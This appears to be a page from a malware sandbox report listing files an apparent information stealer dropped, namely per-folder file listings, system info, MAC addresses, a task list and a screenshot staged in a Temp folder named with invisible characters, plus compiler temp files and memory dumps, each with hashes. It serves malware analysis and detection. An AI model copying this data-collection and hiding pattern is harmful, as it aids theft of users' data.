C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Desktop.txt

Filesize
729B

MD5
9dda96958ac45cfba49aa64fb98fc6d4

SHA1
f7c88ecc3566e57b284ba38ab111aa350bf5ae09

SHA256
3325bdb2584aaf42030890d6ca1eb237aebeca0b11ab7414eef03902a6cee2ed

SHA512
4872249092f8e69666c85d29f2e7e963d81a70d421ad3dbb108f25f36241adb755028c014186222e83487ffc2bb68d5937b44594110c35ee00e85109ebbb08c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Documents.txt

Filesize
962B

MD5
d0a2ea7cff592bd766deee0cac975216

SHA1
77a996f9f262859c8e948ba1346058ab3fd24ed3

SHA256
6fd70559024d40ea9078142faf2074bff6d09f0e6806f8db5756298b89aad5cf

SHA512
19882cea7b6573f7578caba68b640a491fd1a5b39db635f1edd1633460fd8d22df1b015076907ecd53a64e5517787818af5d357c3f7f4e04404bd6215c122d9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Downloads.txt

Filesize
863B

MD5
189e5bbf45c0e09fa1fd8af05e36b7a4

SHA1
a015f5a5b15e2101d5c64d78be21f575c4146cf9

SHA256
b7bc1d4240f8475e41e1c2daafa44ab4e6f7f4783f0d21a053e5c5ccbd4532d2

SHA512
e7ad2e1344bc33afeeaa3c55d561a08768dd0c9596838f1467e5adbb40014ecceb0cb45eb8f8f77719fdf8f59f5b00e7090ccc87dd2356706b3180aee6b7b65b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Music.txt

Filesize
382B

MD5
43e0e9fc00696eb17391123cce59e31d

SHA1
e091e94b18516d2542c51fccc1459bcfe6e39773

SHA256
3a4e4fd8161071b87887c8d401e4ba22cd4882652b16d9e0e03833dddf92be7c

SHA512
889065fbc3731b2dba02744466cdc4ee1359965a5f13ea8f454c00bac2c45f3b41e3205d29eb3b0f8c00bc90b3a69466c3479707ce4c92ffbf1464bfa0c2df95

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Pictures.txt

Filesize
794B

MD5
e3a09be2eaeb3e1ee2cbdeb07de88950

SHA1
1a9c7f5ec6bced6b478f6e2fe6423b0ab9835631

SHA256
ad8f7d41f48e4b87e2ca3eb0465712e86f543edf180c0d3c145214c877ac224b

SHA512
855d5aab8c5f61d26c879446dbeae656e0adb9d746ef2921be9e91e52bdc874131a9fd022826fac17f26003e2b256e023f35ae9bcf033175c76f35ff203309bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \Display (1).png

Filesize
413KB

MD5
b8049f28c74e558020eca53519a2f2b7

SHA1
a73ae7ba3e91eb9c327801592314de2c1620594d

SHA256
8537873ad01c420ea4453f591d802e4cdb2156431b169c9fa714bc12d64aa729

SHA512
857dbe7ee7917bcf47d3b2e6114eb1f54d0a6a71d46beec838c7de4b9cdfbdce73780001dc2f0150848cd707f541403f67d24b1de563f0daef50e68f60f98129

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \System\MAC Addresses.txt

Filesize
232B

MD5
58d8ffe6277d2d444ae0d6c92a5d575b

SHA1
6f3bf0ad30903e688c0ead0ee1dad6b96c97e866

SHA256
489408d55f980a1acf08a1f8ba234944d788a487b38264fde58573baa9866329

SHA512
20aa8a3846036951b19c79dbd1af2d65d72de255872abc82d7784edf70e57c69c41a9a902ad8b1036f7c583aa9efd4910c31f614c5ee56361a0948bc81353aa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \System\System Info.txt

Filesize
2KB

MD5
650a198d100d15f572c981cb59c88e28

SHA1
9dc8b310152a939a3b22226590351eeb310cd3c1

SHA256
0a8ca64765793deef37dc15a939f7f01e3054fdebdfe91bf26a3060799a0f253

SHA512
39afe21f3e547c5f4eedea7b36038fb42c6dd5f7704d10c7292e7bd797506433fb9f66eac58227642b8cf360da7fc6b6b559c4d98c946ee20ceaa0811402939a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‎ ‏ \System\Task List.txt

Filesize
12KB

MD5
641f106acf14a104ed2e225a2cfb442c

SHA1
2aa7e6ebcd3908fe7c131315e384b345ed9c7921

SHA256
19798fc2d96efbc93d4c015df24ac6cc3aa8c369c3cea73e8afb0560cc7e5462

SHA512
4485a4b9cde476478af34a2131936c0ef208f2eee17e88352d292b9c7b86e7cd1dd838d04afbec28f4877d5d969470173cf17789cab3b10f9e4c04b08f3c4a31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zepngvc1\CSCE8C4BB9A78A4D7D93E257F5FDFE2DD.TMP

Filesize
652B

MD5
bee7b8cee315257b8e431eff388e1e36

SHA1
32e324ddc751303674ba7f7576bd5fc3152259f2

SHA256
6b9be6bb3156306109a70d9692584eae1858bc6b2e746d1c09c210a218ea2997

SHA512
2e3d1586b9fe1a5660141c9393a3584e1fd2e233470490d5d2678f194f26651b880c8c99443fabd0ff6997f099fe9035c144752814b9ed4910686c3927f8f0f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zepngvc1\zepngvc1.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zepngvc1\zepngvc1.cmdline

Filesize
607B

MD5
e70e02ecc0531dde7ef15a86d3b75ab1

SHA1
2ad29e2dcb0fa09ffec4fed15c74be9315c8b63c

SHA256
2b66716e2ff726972201698103db7ce69306a345980aee18a98280794352b9a4

SHA512
310aa4c769379b4e49a504111e64c517d683aef45de39a64d8579a8be1b1e18f1563f2117ece66909bc9072d2c5c9173c87b2b3ebb39e14adfba12861c1919ef

Download Submit
memory/1316-83-0x0000024FDD530000-0x0000024FDD552000-memory.dmp

Filesize
136KB

Download
memory/4928-143-0x00000211C8620000-0x00000211C8628000-memory.dmp

Filesize
32KB

Download
memory/4960-56-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp

Filesize
100KB

Download
memory/4960-48-0x00007FFF3F950000-0x00007FFF3F95F000-memory.dmp

Filesize
60KB

Download
memory/4960-76-0x00007FFF3C600000-0x00007FFF3C614000-memory.dmp

Filesize
80KB

Download
memory/4960-70-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp

Filesize
5.9MB

Download
memory/4960-82-0x00007FFF360B0000-0x00007FFF361CC000-memory.dmp

Filesize
1.1MB

Download
memory/4960-71-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp

Filesize
820KB

Download
memory/4960-148-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp

Filesize
1.5MB

Download
memory/4960-73-0x00007FFF32310000-0x00007FFF32839000-memory.dmp

Filesize
5.2MB

Download
memory/4960-200-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp

Filesize
100KB

Download
memory/4960-72-0x000001F8CCE40000-0x000001F8CD369000-memory.dmp

Filesize
5.2MB

Download
memory/4960-74-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp

Filesize
144KB

Download
memory/4960-66-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp

Filesize
204KB

Download
memory/4960-64-0x00007FFF3F8C0000-0x00007FFF3F8CD000-memory.dmp

Filesize
52KB

Download
memory/4960-62-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp

Filesize
100KB

Download
memory/4960-60-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp

Filesize
1.5MB

Download
memory/4960-58-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp

Filesize
140KB

Download
memory/4960-79-0x00007FFF3F880000-0x00007FFF3F88D000-memory.dmp

Filesize
52KB

Download
memory/4960-106-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp

Filesize
140KB

Download
memory/4960-78-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp

Filesize
180KB

Download
memory/4960-54-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp

Filesize
180KB

Download
memory/4960-216-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp

Filesize
204KB

Download
memory/4960-81-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp

Filesize
100KB

Download
memory/4960-227-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp

Filesize
820KB

Download
memory/4960-228-0x000001F8CCE40000-0x000001F8CD369000-memory.dmp

Filesize
5.2MB

Download
memory/4960-30-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp

Filesize
144KB

Download
memory/4960-239-0x00007FFF32310000-0x00007FFF32839000-memory.dmp

Filesize
5.2MB

Download
memory/4960-253-0x00007FFF3F880000-0x00007FFF3F88D000-memory.dmp

Filesize
52KB

Download
memory/4960-252-0x00007FFF3C600000-0x00007FFF3C614000-memory.dmp

Filesize
80KB

Download
memory/4960-240-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp

Filesize
5.9MB

Download
memory/4960-265-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp

Filesize
820KB

Download
memory/4960-264-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp

Filesize
204KB

Download
memory/4960-263-0x00007FFF3F8C0000-0x00007FFF3F8CD000-memory.dmp

Filesize
52KB

Download
memory/4960-262-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp

Filesize
100KB

Download
memory/4960-261-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp

Filesize
1.5MB

Download
memory/4960-260-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp

Filesize
140KB

Download
memory/4960-259-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp

Filesize
100KB

Download
memory/4960-258-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp

Filesize
180KB

Download
memory/4960-257-0x00007FFF3F950000-0x00007FFF3F95F000-memory.dmp

Filesize
60KB

Download
memory/4960-256-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp

Filesize
144KB

Download
memory/4960-255-0x00007FFF32310000-0x00007FFF32839000-memory.dmp

Filesize
5.2MB

Download
memory/4960-254-0x00007FFF360B0000-0x00007FFF361CC000-memory.dmp

Filesize
1.1MB

Download
memory/4960-24-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp

Filesize
5.9MB

Download